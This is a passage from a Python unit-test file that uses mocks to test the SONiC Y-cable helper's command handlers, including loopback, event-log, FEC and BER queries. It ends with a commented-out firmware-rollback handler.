           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_loop_cmd_arg_tbl_notification(
        {"config_loop": True}, loop_arg_tbl, loop_sts_tbl, loop_rsp_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "enable",
                               {"enable": "0", "lane_mask": "0", "mode_value": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Loopback 'enable' sub-command with a well-formed arg payload returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    loop_arg_tbl = loop_sts_tbl = loop_rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_loopback_mode.return_value": True,
           "disable_loopback_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_loop_cmd_arg_tbl_notification(
        {"config_loop": True}, loop_arg_tbl, loop_sts_tbl, loop_rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "disable",
                               {"disable": "0", "lane_mask": "0", "mode_value": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Loopback 'disable' sub-command with a well-formed arg payload returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    loop_arg_tbl = loop_sts_tbl = loop_rsp_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_loopback_mode.return_value": True,
           "disable_loopback_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_config_loop_cmd_arg_tbl_notification(
        {"config_loop": True}, loop_arg_tbl, loop_sts_tbl, loop_rsp_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """An fvp without the 'show_event' key takes the else branch and returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    event_sts_tbl = event_rsp_tbl = event_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        FIRMWARE_DOWNLOAD_STATUS_INPROGRESS=1,
        PRBS_DIRECTION_BOTH=2,
        **{"enable_prbs_mode.return_value": True,
           "disable_prbs_mode.return_value": True,
           "reset.return_value": True,
           "set_fec_mode.return_value": True})
    port_instance_helper = port_instance
    rc = handle_show_event_cmd_arg_tbl_notification(
        {"config_loop": True}, event_sts_tbl, event_rsp_tbl, event_res_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_get_log(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'show_event' notification completes and returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    event_sts_tbl = event_rsp_tbl = event_res_tbl = mock_swsscommon_table
    # NOTE(review): this local mock shadows the injected fixture and is never
    # wired into the patched lookup, so the handler sees a default MagicMock.
    port_instance = MagicMock()
    port_instance.get_event_log.return_value = ["log 1", "log 2"]
    rc = handle_show_event_cmd_arg_tbl_notification(
        {"show_event": True}, event_sts_tbl, event_rsp_tbl, event_res_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_get_actual_log(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'show_event' with a configured instance returning real log entries returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    event_sts_tbl = event_rsp_tbl = event_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_event_log.return_value = ["log 1", "log 2"]
    # Wire the configured instance into the last injected mock fixture.
    port_instance_helper.return_value = port_instance
    rc = handle_show_event_cmd_arg_tbl_notification(
        {"show_event": True}, event_sts_tbl, event_rsp_tbl, event_res_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_get_no_log(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'show_event' still returns None when the event log is not retrievable."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    event_sts_tbl = event_rsp_tbl = event_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    # Simulate an unusable log result (an Exception object, not raised).
    port_instance.get_event_log.return_value = Exception(NotImplementedError)
    rc = handle_show_event_cmd_arg_tbl_notification(
        {"show_event": True}, event_sts_tbl, event_rsp_tbl, event_res_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Without the physical-port lookup patched, the handler fails with -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    event_sts_tbl = event_rsp_tbl = event_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_event_log.return_value = ["log 1", "log 2"]
    port_instance_helper = port_instance
    rc = handle_show_event_cmd_arg_tbl_notification(
        {"show_event": True}, event_sts_tbl, event_rsp_tbl, event_res_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
def test_handle_show_event_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
    """Without the port-instance lookup patched, the handler fails with -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    event_sts_tbl = event_rsp_tbl = event_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_event_log.return_value = ["log 1", "log 2"]
    rc = handle_show_event_cmd_arg_tbl_notification(
        {"show_event": True}, event_sts_tbl, event_rsp_tbl, event_res_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_status(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """An fvp without the 'get_fec' key takes the else branch and returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    fec_rsp_tbl = fec_sts_tbl = fec_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    rc = handle_get_fec_cmd_arg_tbl_notification(
        {"show_event": True}, fec_rsp_tbl, fec_sts_tbl, fec_res_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Without the physical-port lookup patched, the handler fails with -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    fec_rsp_tbl = fec_sts_tbl = fec_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    rc = handle_get_fec_cmd_arg_tbl_notification(
        {"get_fec": True}, fec_rsp_tbl, fec_sts_tbl, fec_res_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
    """Without the port-instance lookup patched, the handler fails with -1."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    fec_rsp_tbl = fec_sts_tbl = fec_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance_helper = port_instance
    rc = handle_get_fec_cmd_arg_tbl_notification(
        {"get_fec": True}, fec_rsp_tbl, fec_sts_tbl, fec_res_tbl, 0, "Ethernet0")
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_result(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """'get_fec' with an instance reporting fec/anlt/speed values returns None."""
    mock_swsscommon_table.return_value = MagicMock()
    # All three DB table handles share the same mocked swsscommon Table.
    fec_rsp_tbl = fec_sts_tbl = fec_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.configure_mock(
        **{"get_fec_mode.return_value": 0,
           "get_anlt.return_value": 0,
           "get_speed.return_value": 0})
    rc = handle_get_fec_cmd_arg_tbl_notification(
        {"get_fec": True}, fec_rsp_tbl, fec_sts_tbl, fec_res_tbl, 0, "Ethernet0")
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec",
                               {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port',
       MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_ber_cmd_arg_tbl_notification_no_status(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """An fvp without the show-ber trigger key takes the else branch and returns None.

    Renamed from test_handle_get_fec_cmd_arg_tbl_notification_no_status: this
    test exercises handle_show_ber_cmd_arg_tbl_notification, not the get_fec
    handler, and the old name duplicated the get_fec test defined earlier in
    the class, shadowing it so it was never collected or run.
    """
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    # All four DB table handles share the same mocked swsscommon Table.
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    asic_index = 0
    port = "Ethernet0"
    fvp = {"show_event": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Physical-port lookup is left unpatched, so the handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
    """Port-instance lookup is left unpatched, so the handler reports failure with -1.

    NOTE(review): decorators inject bottom-up, so `port_instance` actually receives the
    Table mock and `mock_swsscommon_table` the y_cable_port_instances mock; harmless here.
    """
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "ber", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_ber(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """With the gathered arg type "ber", the handler completes and returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_ber_info.return_value = ["100", "200"]
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "eye", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_eye(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """With the gathered arg type "eye", the handler completes and returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_eye_info.return_value = ["100", "200"]
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec_stats", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_fec_stats(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """With the gathered arg type "fec_stats", the handler completes and returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_fec_stats.return_value = {"100": "200"}
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "pcs_stats", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_pcs_stats(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """With the gathered arg type "pcs_stats", the handler completes and returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_pcs_stats.return_value = {"100": "200"}
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "cable_alive", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_alive_status(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """With the gathered arg type "cable_alive", the handler completes and returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.get_alive_status.return_value = True
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "debug_dump", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_debug_dump_registers(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """With the gathered arg type "debug_dump", the handler completes and returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
    xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
    xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_ber_res_tbl = mock_swsscommon_table
    port_instance = MagicMock()
    port_instance.debug_dump_registers.return_value = {"register1": "100"}
    asic_index = 0
    port = "Ethernet0"
    fvp = {"get_ber": True}
    rc = handle_show_ber_cmd_arg_tbl_notification(
        fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
    assert rc is None
"""
def handle_config_firmware_roll_cmd_arg_tbl_notification(fvp, xcvrd_roll_fw_cmd_sts_tbl, xcvrd_roll_fw_rsp_tbl, asic_index, port):
fvp_dict = dict(fvp)
if "rollback_firmware" in fvp_dict:
file_name = fvp_dict["rollback_firmware"]
status = 'False'
if file_name == 'null':
file_full_path = None
else:
file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
if not os.path.isfile(file_full_path):
helper_logger.log_error("Error: cli cmd mux rollback firmware file does not exist port {} file {}".format(port, file_name))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
break
physical_port = get_ycable_physical_port_from_logical_port(port)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get physical port for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get port instance for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
with y_cable_port_locks[physical_port]:
try:
status = port_instance.rollback_firmware(file_full_path)
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the rollback_firmware API for port {} due to {}".format(physical_port,repr(e)))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Wrong param for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', 'False', xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
"""
